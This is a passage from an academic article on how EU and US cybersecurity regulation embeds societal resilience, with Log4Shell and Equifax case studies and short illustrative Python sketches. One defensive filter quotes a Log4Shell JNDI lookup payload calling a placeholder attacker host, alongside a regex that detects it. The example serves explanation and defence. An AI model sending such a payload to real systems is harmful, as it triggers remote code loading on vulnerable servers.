Article

Cybersecurity Regulations and Software Resilience: Strengthening Awareness and Societal Stability

1 Department of Modern Technology and Cyber Security Law, Deák Ferenc Faculty of Law and Political Sciences, Széchenyi István University, 9026 Győr, Hungary
2 Cybersecurity Analytics and Operations, Penn State University, University Park, PA 16802, USA
3 Business Management and Marketing, Penn State University, University Park, PA 16802, USA
4 The Ministry of Education, Research, Development and Youth of the Slovak Republic, 851 01 Bratislava, Slovakia
5 Faculty of Management Science and Informatics, University of Žilina, 010 26 Žilina, Slovakia
* Author to whom correspondence should be addressed.
Soc. Sci. 2025, 14(10), 578; https://doi.org/10.3390/socsci14100578
Submission received: 5 June 2025 / Revised: 1 August 2025 / Accepted: 25 September 2025 / Published: 26 September 2025
(This article belongs to the Special Issue Creating Resilient Societies in a Changing World)

Abstract

The societal effects of cybersecurity are widely discussed, but it remains less clear how software security regulations specifically contribute to building a resilient society, particularly in relation to Sustainable Development Goals 5 (Gender Equality), 10 (Reduced Inequalities), and 16 (Peace, Justice and Strong Institutions). This study investigates this connection by examining key EU and U.S. strategies through comparative legal analysis, software development (SDLC) case studies, and a normative–sociological lens. Our findings reveal that major regulations—such as the EU’s Cyber Resilience Act and the U.S. SBOM rules—are not merely reactive, but proactively embed resilience as a fundamental mode of operation. This approach structurally reallocates digital risks from users to manufacturers, reframing software security from a matter of compliance to one of social fairness and institutional trust. We conclude that integrating ‘resilience by design’ into technology rules is more than a technical fix; it is a mechanism that makes digital access fairer and better protects vulnerable populations, enabling technology and society to advance cohesively.

1. Introduction

A seemingly isolated disruption can ripple across sectors, destabilize institutions, disrupt essential services, and slowly erode the fabric of public trust that underpins modern society. The World Economic Forum’s (2023) Global Risks Report makes this point unmistakably clear: ransomware campaigns and software supply chain attacks are no longer confined to corporate networks. These attacks have crossed over into public life, posing risks to economic stability, infrastructure, and the very capacity of societies to absorb shocks while remaining functional. These incidents are not isolated anomalies; they represent a growing pattern, one that increasingly blurs the line between cybersecurity and public resilience. When digital infrastructure fails, as seen in the 2016 Bangladesh Bank breach (Brewster 2016) and the 2021 Colonial Pipeline incident (Easterly and Fanning 2023), what breaks down is not merely a system but public trust. When trust erodes, the consequences are rarely confined to institutional dysfunction, and in some cases the rupture rises to the level of national security.
In this context, cyber resilience can no longer be reduced solely to technical posture. While traditional cybersecurity primarily focuses on preventing intrusions (defense), resilience encompasses the broader capacity to withstand, adapt to, and recover from disruptions, ensuring continued core functionality even when defenses are breached. It is increasingly understood as the technological extension of a broader societal capacity, one that depends not only on resistance but also on the ability to recover, adapt, and reorganize. Today, resilience is no longer confined to systems that merely preserve the status quo. What we mean, and what we increasingly have to mean, is something deeper: the ability to move with a disruption, absorb it, learn from it, and keep going. This is why concepts like “resilience by design” or “zero trust” have begun to appear not only in engineering manuals but in policy papers (Van Bossuyt et al. 2023) as well. They have crossed over. They are now part of how we think about trust: about how institutions endure, how people stay included, and how legitimacy is built when systems are tested. It is no longer just about fending off attacks; it is about preventing the core structure of public life from unravelling in real time. Microsoft highlights Zero Trust as a foundational security strategy suited to the demands of the modern digital environment. The global shift to remote and later hybrid work models during the COVID-19 pandemic accelerated the need for such an approach, as organizations faced a significant rise in the volume and sophistication of cyberattacks. The Zero Trust model emphasizes continuous authentication and authorization of access requests, taking into account user identity, location, and device health. Unlike traditional perimeter-based defenses, the Zero Trust approach operates under the assumption that a breach may already exist within the internal network. As a result, every request is treated as though it originates from an untrusted source, regardless of location or requested resource. Each access attempt must be explicitly verified, authorized, and encrypted, ensuring stricter control over system interactions (Microsoft 2022).
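To make the Zero Trust logic tangible, the following minimal sketch illustrates how a policy decision point might evaluate a single access request. It is purely illustrative: the function and attribute names are our own constructions, not drawn from Microsoft’s or any vendor’s implementation, and a production system would combine far richer signals.

from dataclasses import dataclass

@dataclass
class AccessRequest:
    user_authenticated: bool      # e.g., passed multi-factor authentication
    device_compliant: bool        # device health attested (patched, managed)
    location_expected: bool       # request origin matches known user patterns
    resource_sensitivity: str     # "low", "medium", or "high"

def evaluate_request(req: AccessRequest) -> str:
    """Illustrative Zero Trust policy decision: every request is verified,
    whether it originates inside or outside the network perimeter."""
    # Explicit verification: no request is trusted by default.
    if not req.user_authenticated:
        return "deny"
    # Risk signals are combined rather than assessed in isolation.
    risk_signals = sum([not req.device_compliant, not req.location_expected])
    if req.resource_sensitivity == "high" and risk_signals > 0:
        return "deny"             # high-value resources tolerate no anomalies
    if risk_signals > 1:
        return "step_up_auth"     # require re-authentication before access
    return "allow_least_privilege"

The essential point the sketch captures is that identity, device health, and location are re-evaluated on every access attempt, and higher-value resources tolerate fewer anomalies.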
Within this shifting terrain, the meaning of resilience itself is changing. It is not just a score on a readiness index but a normative structure: a way of organizing technical, legal, and social decisions so that digital infrastructures do not just work but hold together under pressure. This shift is perhaps most evident in how we have come to view software security, not just as a coding problem but as a political and social problem. The most damaging attacks are not always the loudest. They are the attacks that slip through the cracks we have left open: unpatched systems, unclear ownership, and unmonitored update chains. While new technologies like Security Orchestration, Automation and Response (SOAR) or AI-driven detection are changing the game, they do not work in a vacuum. Without legal clarity and norms to anchor them, even the best systems fall short. Resilience extends beyond mere code; it requires structure and trust.
To fully grasp this expanded understanding, it is essential to consider the broader concept of societal resilience and how it intersects with the evolving cybersecurity landscape. Societal resilience, in this context, refers to the capacity through which individuals, micro- or macro-level communities, or society as a whole are able to respond effectively to disruptions of ordinary processes (Cañizares et al. 2021). The relationship between cybersecurity and societal resilience is particularly close; it is therefore worth examining the academic literature from a policy perspective. The convergence of these two fields was already highlighted in the European Union’s 2013 Cybersecurity Strategy (European Commission 2013), which emphasized the need to strengthen individual cybersecurity awareness and, among other measures, introduced the European Cybersecurity Month. The North Atlantic Treaty Organization (NATO), for its part, recognized cyberspace as a domain equivalent to traditional theatres of war and initially focused on building the resilience of its personnel. It is important to note the significant overlap in membership between these two organizations, with the majority of EU member states also being NATO allies, which often fosters complementary policy approaches in security matters. However, in the wake of the hybrid war in Ukraine and the growing number of cyberattacks from China, Russia, and North Korea, the 2018 Brussels Summit Declaration went further, committing to a comprehensive, multi-layered form of cyber resilience that encompasses society as a whole (North Atlantic Council 2018).
In the following decade, documents from both organizations have consistently emphasized societal adaptability in the cyber domain as a core element of resilience. The EU’s 2017 and 2020 Cybersecurity Strategies describe cyberattacks as national security threats and underline that strengthening societal resilience in this area is among the key conditions of an effective response. The urgency of this need was only intensified by the COVID-19 pandemic and the subsequent outbreak of war in Ukraine (Kuzior et al. 2024; Farkas and Vikman 2024; Kelemen 2023). NATO’s 2021 declaration, the Strengthened Resilience Commitment, described national and collective resilience as guarantees of credible deterrence. Within the NATO 2030 framework, improving societal resilience, specifically in the area of cybersecurity, was set as a priority; a goal further reinforced in the 2022 NATO Strategic Concept, which ties this to the imperative of maintaining technological superiority.
Academic discourse has begun to explore the nexus between cybersecurity and societal resilience. Building on the early work of Arturo Escobar (1994) and other Science and Technology Studies (STS) scholars (e.g., Latour 1987), it has been widely argued that technology is not separate from the social world but is shaped by it and, in turn, influences it. In Escobar’s view, the kinds of tensions we see in physical space also appear in cyberspace, which means resilience strategies need to account for these dynamics as well (Escobar 1994). This perspective later gave rise to the idea of socio-technical vulnerability, which holds that cybersecurity and cyber resilience are influenced not just by technical factors but also by individuals’ lived experiences and the values embedded in society. Accordingly, cybersecurity should be understood as a combination of the social and the technical, rather than a purely technical problem involving human operators (Cavelty et al. 2023).
A particularly relevant approach in this context is that of resilience by design, the idea, now gaining traction, of embedding resilience into system design. This principle is complementary to, but distinct from, the more established concept of security by design. While security by design focuses on proactively building defenses to prevent breaches (‘baking security in’), resilience by design assumes that failures or breaches will inevitably occur and aims to ensure that the system can withstand, adapt to, and quickly recover from them (Colabianchi et al. 2021). In practice, this means designing cyber infrastructures that are not only technically robust but also attuned to the social environment. By embedding resilience from the outset, rather than treating it as an add-on, these systems are better equipped to remain functional under unpredictable and hostile conditions. This forward-looking approach is crucial in today’s vulnerable and ever-evolving digital ecosystems (Colabianchi et al. 2021).
Recent contributions also emphasize the need for a better understanding of cyber threats at the individual level, as this awareness often serves as the first step toward preventing systemic failures. Several authors have argued that the increasing complexity of cyber threats requires more than ad hoc responses. A structured, multi-level preparedness model has therefore been proposed, enabling institutions to respond to evolving risks in a more deliberate and adaptive manner (Saeed et al. 2023). In parallel, national cybersecurity defensive measures are being recognized not only as technical frameworks but also as critical policy instruments that shape awareness and contribute directly to strengthening social resilience (Aldaajeh et al. 2022). Another recurring theme is the demand for the development of advanced digital skills to effectively mitigate cyber threats (Kelemen et al. 2024). Educational initiatives that aim to foster these competences are therefore of vital importance to the qualitative improvement of societal resilience (Maurer and Fritzsche 2023).
The socio-technical model and the resilience-by-design principle are also crucial in the field of software development (Colabianchi et al. 2021). Embedding cybersecurity into development workflows is no longer optional; it has become a core element of responsible digital design. This shift is further evident in how agile methodologies are utilized with continuous iteration and testing, while secure design principles are embedded across the full software development lifecycle. When combined with the implementation of resilient interfaces, such as multi-factor authentication, the result is a significant step toward building digital tools that are both secure and sustainable (Tashtoush et al. 2022; Andrade et al. 2023; Von Solms and Futcher 2020). At the same time, however, the human factor remains equally important, both in terms of responsible software development and conscious use. On the developer side, this involves intentionally incorporating cybersecurity requirements into programming, while on the user side, it includes making informed decisions about software and regularly updating systems (Gasiba et al. 2020; Xiao and Spanjol 2021; Sun et al. 2024). Together, these factors enhance both cybersecurity and societal resilience in qualitative terms.
The literature also highlights that societal resilience, cybersecurity, and software development have implications for achieving the Sustainable Development Goals (SDGs). These connections may be direct or indirect: cybersecurity is now essential in the context of SDG 4C (quality education), SDG 9 (industry, innovation and infrastructure), and SDG 9C (access to digital technologies); all of which are prerequisites for improving cyber resilience. Additionally, the strengthening of cybersecurity resilience may also contribute to SDG 16, which aims to promote peaceful, just, and inclusive societies. The addition of more robust defense mechanisms can reduce the effectiveness of cyberattacks, thereby helping to diminish both cybercrime and organized criminal activity (Dede et al. 2024; Aziz et al. 2025; Popkova et al. 2022).
From the above, it is evident that both NATO and the European Union prioritize cybersecurity, and at present, recognize it as a core pillar of societal resilience. The literature largely agrees that cybersecurity should not be reduced to a technical issue alone. Its social aspects are equally critical, often shaping the very conditions under which resilience can emerge. This recognition also brings certain responsibilities at the level of public policy. Efforts to increase awareness, rethink education, and support secure development and use of software are not peripheral; they form the foundation of any serious attempt to build societal resilience. Indeed, these efforts are closely aligned with the broader objectives of the SDGs. However, while the societal significance of cybersecurity and its connection to resilience are increasingly recognized, the specific structural role of regulation in actively shaping this resilience often remains a less explored dimension. This study, therefore, stems from a simple premise: we cannot understand societal resilience without examining how cybersecurity regulation is structured. It is not enough to ask what technical safeguards exist; we must also examine how they are framed in law, how they allocate responsibility, and how they contribute to broader policy goals, particularly the Sustainable Development Goals (SDGs 5, 10, and 16). Consequently, the central question of this paper is: do the cybersecurity regulations safeguarding the EU and the US, specifically those dealing with software, merely react to threats, or can they offer structural responses to the vulnerabilities of the digital society they serve to protect? Can they do more than defend; can they build?

2. Materials and Methods

This study explores how cybersecurity regulation shapes the social architecture of resilience. To achieve this, it adopts an interdisciplinary approach, weaving together interpretive legal theory, public policy analysis, and an operational understanding of cybersecurity. The guiding research question is as follows: how do EU and US cybersecurity regulations, particularly those addressing software security, embed and operationalize the concept of societal resilience?
To address this question, the study proceeds along four interrelated analytical strands, each employing specific methodological tools. The overall research process is illustrated in Figure 1. The aim is not to measure resilience quantitatively but to offer an interpretive exploration of how legal and policy frameworks embed normative expectations around societal resilience, focusing on its transformative potential for democratic participation, digital equity, and institutional trust.

2.1. Discourse Analysis of Strategic Policy Documents

The first analytical strand involves a critical qualitative discourse analysis of three strategic documents: the European Union’s 2020 Cybersecurity Strategy, the 2025 Internal Security Strategy (ProtectEU), and the United States’ National Cybersecurity Strategy (2023). These documents were selected for their pivotal role in shaping post-2020 cybersecurity governance in response to hybrid threats and infrastructure-level digital risks. The analysis employed thematic coding, focusing on how key terms such as “resilience,” “security by design,” and “public trust” are deployed. While our focus on “resilience” was driven by the central research question, the concepts of “security by design” and “public trust” emerged as dominant themes during our initial review of the policy documents. We selected this cluster of terms for analysis because they represent the key conceptual points where the discourse shifts from a purely technical to a socio-political understanding of cybersecurity. The analysis then examined their semantic frequency, their positioning within institutional, civic, and technological framings, and their explicit or implicit connections to the Sustainable Development Goals (SDGs 5, 10, and 16). The aim was to understand how these discourses construct societal resilience and align it with regulatory priorities.
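For transparency, the mechanical portion of this coding step can be expressed as a simple frequency count. The sketch below (in Python, with illustrative names of our own choosing) reproduces only the counting of coded terms across a document; the thematic interpretation of their institutional, civic, and technological framings remained an interpretive, human task.

import re
from collections import Counter

# The coded term cluster identified in the initial review of the documents.
TERMS = ["resilience", "security by design", "public trust"]

def term_frequencies(text: str) -> Counter:
    """Count non-overlapping occurrences of each coded term in a
    policy document supplied as plain text."""
    lowered = text.lower()
    return Counter({t: len(re.findall(re.escape(t), lowered)) for t in TERMS})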

2.2. Comparative Legal Analysis of Regulatory Texts

The second strand applies a comparative legal analysis to selected regulatory texts from both the European Union (the EU Cybersecurity Act and the EU Cyber Resilience Act) and the United States (Executive Order 14028 (2021), the 2023 National Cybersecurity Strategy, FISMA, and provisions related to Software Bill of Materials (SBOM) implementation). The comparative analysis focused on how the concept of resilience is embedded within these frameworks by examining: (a) the social mechanisms mobilized; (b) the distribution of responsibility among developers, vendors, and users; and (c) the underlying regulatory logics governing technical risk. Special attention was paid to whether software security is addressed as a socio-economic issue, whether responsibility extends to producers, whether transparency towards users is mandated, and whether these instruments promote equitable access to digital safety. The selection criteria for these legal instruments were their landmark status and direct relevance to software security governance and its societal implications on both sides of the Atlantic. The findings of this comparative analysis are synthesized in a dedicated overview in Section 4.4, providing a direct comparison of the regulatory approaches. It is important to specify that our approach is not one of doctrinal legal analysis but rather an interpretive socio-legal one. We treat these regulatory texts as authoritative policy documents, examining the ways in which they frame problems, allocate responsibility, and embed normative goals. This methodological choice is grounded in the socio-legal tradition, which posits that legal frameworks cannot be understood in isolation from their societal context. As the legal philosopher Vilmos Peschka argued, the existence, function, and impact of law are determined by its ‘incessant connection with the other partial complexes’ of the social totality (Peschka 1988). Consequently, our analysis focuses on these connections, including the normative goals expressed in non-binding but interpretively crucial sections such as the recitals, to understand the law’s intended and potential societal impact.

2.3. Case Study Analysis of Software Vulnerabilities

The third analytical strand examines the issue from the perspective of information security and software engineering, focusing on resilience-conscious design and governance within the Software Development Life Cycle (SDLC). This section employs a qualitative case study methodology, analyzing the Log4Shell vulnerability and the 2017 Equifax data breach. These cases were selected because they clearly demonstrate how technical software vulnerabilities can cascade into wider institutional and societal trust failures, with extensive publicly available evidence (incident reports, technical analyses, policy responses) enabling a detailed examination. The SDLC’s core stages, including requirements analysis, design, implementation, testing, deployment, and maintenance, are examined here as critical junctures where vulnerability management practices directly shape resilience outcomes. The analysis focuses on how failures to embed secure development practices and coordinated patch management at these stages amplified risks across technical, institutional, and societal layers. This perspective reframes the SDLC not merely as an engineering workflow but as a normative arena in which resilience is actively built and maintained.

2.4. Normative–Sociological Interpretation

The fourth strand develops a normative–sociological interpretation of societal resilience, grounded in the conceptual frameworks of the “social–technological model” and “resilience by design.” This analysis employs interpretive methods, drawing on institutional hermeneutics and critical discourse analysis as applied to the previously examined strategic, legal, and case study materials. Its aim is to demonstrate that resilience is an active capacity rooted in citizen engagement with the design, governance, and institutional framing of digital infrastructures. The analysis focuses on how regulatory expectations, institutional architectures, and cultural norms interact to shape the lived experience of digital participation and how resilience emerges as a socially configured practice.

3. Results

To understand how cybersecurity regulations can effectively embed and operationalize societal resilience, it is first necessary to establish the foundational findings related to the software security landscape. This section, therefore, presents the results concerning the characteristics of prevalent software models, the systemic impact of major security breaches, and the critical junctures within the Software Development Lifecycle (SDLC) where resilience is either compromised or cultivated.

3.1. Proprietary vs. Open-Source Software: Contrasting Security Implications and Resilience Profiles

The advancement of information and communication technologies is not simply reshaping daily life; it is reprogramming its logic. What appears as innovation on the surface carries, almost by necessity, a deepening exposure beneath it. Cyberattacks are no longer erratic but systematic, tracking the same arc as the infrastructures they target. This analysis reveals that security, in this light, is no longer a technical supplement; it is a structural precondition for resilience. A core component of this challenge lies in software security, where findings align with the perspective that cybersecurity is inherently a socio-technical problem (Cavelty et al. 2023). Consequently, a key distinction in source code accessibility—between closed (proprietary) and open-source (OSS) models—emerges as a critical factor, as each model entails differing development philosophies, security implications, risk profiles, and technical and societal dimensions.
Source code refers to a sequence of instructions written in a format humans can read and work with, which is later compiled into an executable application. In proprietary systems, this code remains under the control of the developer, with user access tightly regulated through licensing agreements. Analysis of this model indicates that security responsibility is placed almost entirely with the vendor (e.g., Microsoft, Apple), who may invest substantial resources in internal protocols, embedded protections, and regular updates. While the restricted nature of the codebase can offer protection against direct exploitation, it also presents challenges, such as limited transparency and vendor dependency, that may in themselves weaken resilience (Guo et al. 2022).
Understanding the socio-technical nature of cybersecurity must also be grounded in core principles that inform secure software design. Cybersecurity is not solely a technical challenge—it is deeply intertwined with human behavior, organizational processes, and societal structures. This socio-technical dimension recognizes that even the most advanced security technologies can fail if people misuse them, ignore protocols, or if organizations do not support a security-conscious culture.
A basic prerequisite for developing security-aware applications is a solid understanding of fundamental concepts in the field, which helps developers recognize threats, implement controls, and grasp the broader purpose of the software beyond its functionality (Janca 2021). One such foundational framework is the CIA triad—confidentiality, integrity, and availability—which remains central to organizational information security strategies (Chai 2022).
Confidentiality refers to protecting sensitive data from unauthorized access. Based on the potential impact of exposure, data is categorized, and safeguards are applied accordingly. Two-factor authentication is a common measure that helps enforce confidentiality by requiring additional identity verification during login attempts.
Integrity emphasizes the reliability, consistency, and trustworthiness of data across its lifecycle. This involves preventing unauthorized modifications, whether during transmission or due to internal breaches. For example, users can monitor banking transactions and report inconsistencies if unauthorized changes are suspected.
Availability ensures that systems and data are reliably accessible to authorized users. It also involves maintaining the technical infrastructure needed to deliver uninterrupted service and protect against downtime or system failure (Chai 2022).
These core principles are not only theoretical but directly influence development choices, particularly in the implementation of security mechanisms across both open-source and proprietary software environments.
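As a brief illustration of how one of these principles translates into development practice, consider integrity verification of a downloaded software artifact. The following sketch is our own illustrative example, not tied to any specific product: it compares a file’s SHA-256 digest against a digest published by the vendor, so that a mismatch signals unauthorized modification in transit or at rest.

import hashlib

def file_sha256(path: str) -> str:
    """Compute the SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_integrity(path: str, published_digest: str) -> bool:
    """Integrity check: the artifact is trusted only if its digest matches
    the value the vendor published over an authenticated channel."""
    return file_sha256(path) == published_digest.lower()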
Open-source models (Hadi et al. 2024), conversely, operate with publicly accessible source code by design. Projects such as Linux or Apache are maintained entirely in the open, often on platforms like GitHub, where developers can inspect, suggest, and modify the code collaboratively. This community-based model, in theory, supports faster identification of vulnerabilities through the “many eyes” principle. However, examination of this model also reveals inherent risks: public access to the code allows malicious actors the same visibility as legitimate contributors; quality control and security audits are not consistently applied; project support is contingent on time, trust, or the availability of contributors; and documentation and update frequency can vary significantly (Shan et al. 2022). The premise that public scrutiny accelerates error detection is tempered by the reality that openness, while beneficial for community collaboration, does not inherently equate to security, as it can equally aid attackers.
The key takeaway from this subsection is that proprietary and open-source models operate on different assumptions regarding responsibility for security. While the control and closed nature of the proprietary model allow for a clearer allocation of liability to the manufacturer, the decentralized nature of the open-source ecosystem results in a more complex web of responsibilities. This distinction is highly significant for the regulatory interventions that follow. As we will detail in Section 4, the regulatory frameworks in both the EU and the US can be understood as normative interventions aimed at recalibrating these responsibility structures, primarily by strengthening the obligations on the side of the producer.

3.2. Lessons from Critical Vulnerabilities: The Cases of Log4Shell and Equifax

The Log4Shell vulnerability, a critical security flaw in the Apache Log4j logging library, serves as a key finding, demonstrating that even a seemingly minor flaw in a widely used open-source component can trigger cascading impacts capable of destabilizing entire systems and institutional structures. The incident analysis highlights that this was not simply a lapse in technical oversight but a wider systemic warning: digital trust is not sustained by scattered ad hoc patches. It depends on the regularity, coordination, and shared accountability of maintenance practices, integrated not as a technical afterthought but as a structural principle. The clear conclusion drawn from this case is that software maintenance cannot be an ad hoc undertaking; it must be built on a deliberate and coordinated strategy where review and maintenance are treated not just as technical obligations but as social contracts (Pigola and De Souza Meirelles 2024).
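The technical mechanism behind Log4Shell is well documented: attacker-controlled strings such as ${jndi:ldap://attacker.example/a} were interpolated by the library’s lookup feature, triggering remote code loading. The sketch below is a deliberately simplified input screen of our own devising, offered only to make the attack surface concrete; real attacks used obfuscated variants, and the durable remedy was coordinated patching rather than pattern matching.

import re

# Simplified signature for Log4Shell-style lookup strings such as
# "${jndi:ldap://attacker.example/a}". Actual exploits used nested and
# mixed-case variants, so matching is at best a stopgap; the durable
# fix is coordinated patching of the Log4j dependency itself.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def screen_log_input(value: str) -> str:
    """Refuse to forward user-supplied strings containing a JNDI lookup
    marker to a potentially vulnerable logging pipeline."""
    if JNDI_LOOKUP.search(value):
        raise ValueError("possible Log4Shell payload rejected")
    return value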
Further findings on effective software security practices indicate that identifying weaknesses is not a matter of picking the “right” tool but a matter of approach. Code review, whether manual or automated, is about more than bug hunting; it ensures fragile parts do not go unnoticed. Network sniffing, a non-interventional method, traces information flow, catching unintended exposures. Penetration testing actively replicates attack scenarios to uncover exploitable gaps. These methods, while effective individually, are found to be substantially more powerful when embedded throughout the entire Software Development Life Cycle (SDLC), from design to maintenance, thereby supporting a proactive mindset where resilience is a structural principle (Wang et al. 2023).
The 2017 Equifax data breach provides another critical illustration. The case demonstrates that effectively managing software security requires a security-conscious approach to the SDLC that also considers the broader socio-technical context. Optimal protection and resilience can only be achieved if security requirements and controls (security by design and “resilience by design”) are consistently integrated from inception to decommissioning (Colabianchi et al. 2021). The Equifax incident underscores the consequences of failing to integrate security from the outset: indefensible risks are accepted, trust erodes, and the damage spills over into society. This case specifically highlights the critical importance of proactive vulnerability and patch management, even in later SDLC phases, not merely as a technical responsibility but as a fundamental element of system-level and societal resilience, as evidenced by persistent organizational shortcomings that prevented timely patch implementation despite a patch being available (Boss et al. 2024).

3.3. Integrating Security and Resilience Across the Software Development Lifecycle (SDLC)

The Software Development Life Cycle (SDLC) represents a systematic framework through which software systems are conceived, built, tested, deployed, and maintained (Khan et al. 2022). Unlike a product life cycle, which addresses market-driven phases such as introduction, growth, maturity, and decline, the SDLC focuses exclusively on the technical and procedural stages that ensure a system’s functional and secure development throughout its operational life. In this structured model, integrating security and resilience requirements into every phase is essential for minimizing socio-technical vulnerabilities and sustaining trust over time. As described by Khan et al. (2022), the SDLC generally involves the following interrelated stages:
  • Requirements Analysis: This phase identifies functional and non-functional requirements, including clear security specifications and initial threat modelling to anticipate technical and user-based risks.
  • Design: System architecture and design patterns are developed with explicit security and resilience considerations, embedding “security by design” from the outset.
  • Implementation: Source code is produced following secure coding standards, accompanied by code reviews and version control practices to detect vulnerabilities early.
  • Testing: Multiple levels of testing—including static and dynamic code analysis, penetration testing, and validation checks—are conducted to verify the integrity and robustness of the system.
  • Deployment: Secure deployment practices ensure that the system is configured correctly, that access controls are enforced, and that protective measures are active at launch.
  • Maintenance: This stage emphasizes continuous monitoring, timely patch management, and regular updates to counter emerging threats. It also requires active collaboration between developers and users to maintain system resilience in dynamic socio-technical environments.
A critical insight here is that, in line with Khan et al. (2022), cybersecurity must be embedded as an ongoing, integrated condition of the development process. Threats such as malware, phishing, distributed denial-of-service (DDoS) attacks, or zero-day exploits demonstrate that resilience cannot be treated as an isolated technical safeguard but must be sustained through continuous practice across the entire SDLC. To be precise, the SDLC framework itself is not inherently resilience-conscious. It becomes so only when ‘resilience-by-design’ principles are deliberately integrated into each phase, transforming the lifecycle from a neutral development process into an active governance framework for managing socio-technical risk.

3.4. The Role of Standards and Modern Development Practices in Operationalizing Resilience

Structured and secure development processes are underpinned by international standards such as ISO (2022), offering a broader framework for governing information security (Kang and Kim 2022). In parallel, modern development practices like DevOps and DevSecOps seek to embed security and resilience into every layer of the development lifecycle. These agile and recursive approaches, grounded in continuous testing and feedback as a condition for forward movement, point towards a continuous negotiation with disruption rather than a static endpoint (Alghawli and Radivilova 2024). It is here that the analysis shows “resilience by design” becoming more than theory: a working logic under pressure, as suggested by Colabianchi et al. (2021). These practices operationalize “security by design” through automated controls and foster a security-conscious development culture that recognizes socio-technical vulnerabilities as inherent features.
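What such automated controls look like in practice can be suggested with a short sketch. The pipeline gate below is illustrative only: ‘security-scanner’ is a placeholder for whichever static analysis tool a team has adopted, and the point is the gating logic (a build fails when high-severity findings exceed a threshold), not the specific tool.

import subprocess
import sys

def run_security_gate(max_high_findings: int = 0) -> None:
    """Illustrative DevSecOps gate: run a static analysis step and abort
    the pipeline if high-severity findings exceed the threshold.
    'security-scanner' is a hypothetical placeholder command."""
    result = subprocess.run(
        ["security-scanner", "--severity", "high", "--count"],
        capture_output=True, text=True,
    )
    high_findings = int(result.stdout.strip() or 0)
    if high_findings > max_high_findings:
        print(f"Gate failed: {high_findings} high-severity findings")
        sys.exit(1)   # a non-zero exit aborts the CI/CD pipeline stage
    print("Security gate passed")

The design choice worth noting is that the gate runs on every build, making security review a continuous condition of movement through the pipeline rather than a one-off audit.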
A concluding finding from this section is that neither the proprietary nor the open-source model offers a standalone guarantee of cybersecurity, each possessing structural strengths and inherent limitations. What matters is not the model itself, but the discipline with which risks are managed across the software lifecycle through testing, auditing, lifecycle-integrated controls, adherence to standards, timely patch management, and development methods treating security as a continuous concern.

4. Discussion

4.1. The U.S. Regulatory Approach: From Compliance to Shared Responsibility in Shaping Digital Resilience

Long before the 2023 cybersecurity strategy appeared in print, the principles it outlines were already present in earlier laws, executive orders, and the silent adjustments of federal practice. Regulatory efforts were already in motion, quietly but deliberately redrawing the lines around critical infrastructure and its increasingly fragile digital underpinnings. In the U.S. context, software security had begun to outgrow its technical framing. It was becoming something else entirely: a structural condition for economic continuity and, more subtly, for public trust.
Federal procurement was suddenly contingent on the integration of security-by-design features. In practice, this had an especially strong impact on the healthcare sector, where devices like patient monitors, ventilators, and medical sensors are now subject to a higher bar of trust and protection. Earlier groundwork had already been laid by the Federal Information Security Modernization Act (FISMA) (2014), which called on federal agencies and their contractors to develop robust cybersecurity frameworks with guidance from the National Institute of Standards and Technology (NIST). At first, it appeared to be a technical issue, a security concern or vulnerability for IT teams to patch, monitor, or log for later. However, over time the scale changed, as what was once buried in backend protocols began appearing in front-page headlines. Gradually, it shifted from being about technology to being about strategy.
The turning point came in May 2021 with the introduction of Executive Order (EO) 14028. Triggered by a high-profile supply chain attack, the executive order sent a clear message: the system had too many blind spots. EO 14028 did not only set out to tighten procurement rules; it called their bluff. Who wrote the software? Who signed off on it? Who updates it? Who disappears when the software fails? Traceability was no longer just a best practice; it became a government contractual precondition. More importantly, the order acknowledged something that had long been avoided: that the state cannot secure its digital ecosystem without private sector alignment. From this point forward, security moved beyond being a siloed duty; it became a shared architecture between the government and private-sector vendors. The order made clear that trust in the digital infrastructure must now be both shared and demonstrable.
One tangible result of EO 14028 was the launch of a cybersecurity labelling program aimed at helping consumers make informed decisions about the software and IoT devices they purchase. Modeled after appliance energy labels, the idea was simple: before buying a device, users should know how long it will be supported, how often it will be updated, and whether or not it meets essential security criteria. These labels were designed to be visible, understandable, and accessible, both physically and digitally (U.S. Cybersecurity and Infrastructure Security Agency (CISA) 2024).
This regulatory framework was later reinforced by a 2021 National Security Memorandum on the cybersecurity of industrial control systems managing critical infrastructure. This was the moment where the state openly conceded what had long been implicit: that it no longer holds the monopoly on securing the nation’s most vital systems. From energy grids to water networks to public transport, the risks had crossed over from speculative scenarios into tangible, measurable vulnerabilities. The distinction between public authority and private obligation began to blur—permanently.
As emphasized in recent scholarship (e.g., Aldaajeh et al. 2022), national strategies and regulatory frameworks are no longer peripheral elements in the formation of cybersecurity awareness and community resilience; they are central drivers. Examining the regulatory and strategic environment of software security has become essential when addressing the national security significance of cyberspace. The fundamental shift in emphasis introduced by the 2023 National Cybersecurity Strategy, from the Trump-era “forward defense” posture toward a cooperation-oriented model, highlights the underlying tensions between technological advancement and institutional governance. The starting point, the Cybersecurity Framework, offers a voluntary and scalable approach for critical infrastructure and government actors, placing particular emphasis on software design, development, and supply chain security. A defining feature of the framework is its reliance not on administrative mandates but on best practices, such as secure-by-design development. The strategy as a whole is built around five key pillars, which serve not only as the vertical scaffolding for task allocation but also as the space where accountability relationships are made explicit. One of the prerequisites for a functioning digital ecosystem is a regulatory framework capable of addressing the risks that come with innovation without stifling it. This delicate balance is precisely what recent U.S. approaches have increasingly and consciously sought to achieve.
The third pillar of the U.S. cybersecurity strategy signals a structural shift: digital risks are no longer seen as individual responsibility but as obligations that must be borne by those with systemic impact, primarily software vendors and major data operators. In the tech industry, this introduces an unfamiliar dynamic. It is no longer just about adopting better practices; it is now essential to acknowledge that insecure defaults, opaque systems, and deferred updates are not technical lapses but public risks. The strategy does not stop at technical prescriptions. Although it calls for secure-by-design development and tighter scrutiny of third-party components, the real move is elsewhere. It shifts the weight of failure, quietly but firmly, onto those who design the systems in the first place, not the users and not the victims. The market is where accountability belongs, and the strategy says as much, even if not explicitly.
This fundamental repositioning of accountability is not merely a policy choice; it reflects a growing consensus in the academic and policy communities. Scholars widely argue that increasing vendor liability is a necessary market incentive to drive better security practices, compelling producers to prioritize cybersecurity from the design phase onward (Bellovin 2023). While there are acknowledged challenges, such as defining the precise boundaries of negligence and avoiding the stifling of innovation (Nash 2021; Bellovin 2023), the underlying principle remains: the actors best positioned to mitigate security risks—the vendors—should bear a greater share of the responsibility. Our analysis aligns with this view, focusing on how this liability shift serves as a key mechanism for building societal resilience.
